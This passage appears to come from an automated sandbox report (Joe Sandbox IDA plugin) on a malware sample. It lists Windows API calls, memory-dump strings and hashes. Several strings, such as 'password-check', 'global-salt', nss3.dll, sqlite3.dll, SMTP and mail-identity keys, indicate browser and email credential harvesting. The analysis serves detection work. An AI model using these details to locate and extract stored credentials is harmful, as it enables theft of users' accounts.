                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                            • String ID: ACD
                                            • API String ID: 1886237854-620537770
                                            APIs
                                            • memset.MSVCRT ref: 004091EC
                                            • sprintf.MSVCRT ref: 00409201
                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                            Strings
                                            Similarity
                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                            • String ID: caption$dialog_%d
                                            • API String ID: 2923679083-4161923789
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                            • memset.MSVCRT ref: 00410246
                                            • memset.MSVCRT ref: 00410258
                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                            • memset.MSVCRT ref: 0041033F
                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                            • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                            Similarity
                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                            • String ID:
                                            • API String ID: 3974772901-0
                                            APIs
                                            • wcslen.MSVCRT ref: 0044406C
                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                            • strlen.MSVCRT ref: 004440D1
                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                            Similarity
                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                            • String ID:
                                            • API String ID: 577244452-0
                                            APIs
                                            • memset.MSVCRT ref: 0040C02D
                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,74DF0A60), ref: 00408EBE
                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408E31
                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                            Strings
                                            Similarity
                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                            • API String ID: 2726666094-3614832568
                                            • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                            • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                            • String ID:
                                            • API String ID: 2014771361-0
                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                            APIs
                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID: global-salt$password-check
                                            • API String ID: 231171946-3927197501
                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                            APIs
                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                            • memset.MSVCRT ref: 0040330B
                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                            • strchr.MSVCRT ref: 0040335A
                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                            • strlen.MSVCRT ref: 0040339C
                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                            • String ID: Personalities
                                            • API String ID: 2103853322-4287407858
                                            • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                            • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                            APIs
                                            • GetParent.USER32(?), ref: 004090C2
                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                            APIs
                                            • _strcmpi.MSVCRT ref: 0040E134
                                            • _strcmpi.MSVCRT ref: 0040E14D
                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _strcmpi$_mbscpy
                                            • String ID: smtp
                                            • API String ID: 2625860049-60245459
                                            • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                            • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                            APIs
                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                            • memset.MSVCRT ref: 00408258
                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                            Strings
                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Close$EnumOpenmemset
                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                            • API String ID: 2255314230-2212045309
                                            • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                            • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                            APIs
                                            • memset.MSVCRT ref: 0040C28C
                                            • SetFocus.USER32(?,?), ref: 0040C314
                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FocusMessagePostmemset
                                            • String ID: S_@$l
                                            • API String ID: 3436799508-4018740455
                                            • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                            • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                            APIs
                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                            • String ID: MS Sans Serif
                                            • API String ID: 3492281209-168460110
                                            • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                            • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ClassName_strcmpimemset
                                            • String ID: edit
                                            • API String ID: 275601554-2167791130
                                            • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                            • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                            APIs
                                            • memset.MSVCRT ref: 0040D2C2
                                            • memset.MSVCRT ref: 0040D2D8
                                            • memset.MSVCRT ref: 0040D2EA
                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                            • memset.MSVCRT ref: 0040D319
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                            APIs
                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: @
                                            • API String ID: 3510742995-2766056989
                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _strcmpi
                                            • String ID: C@$mail.identity
                                            • API String ID: 1439213657-721921413
                                            • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                            • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _ultoasprintf
                                            • String ID: %s %s %s
                                            • API String ID: 432394123-3850900253
                                            • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                            • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                            APIs
                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                            • sprintf.MSVCRT ref: 0040909B
                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                            • String ID: menu_%d
                                            • API String ID: 1129539653-2417748251
                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                            APIs
                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                            • _mbscat.MSVCRT ref: 004070FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscat$_mbscpystrlen
                                            • String ID: sqlite3.dll
                                            • API String ID: 1983510840-1155512374
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                            • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID: MZ@
                                            • API String ID: 1378638983-2978689999
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0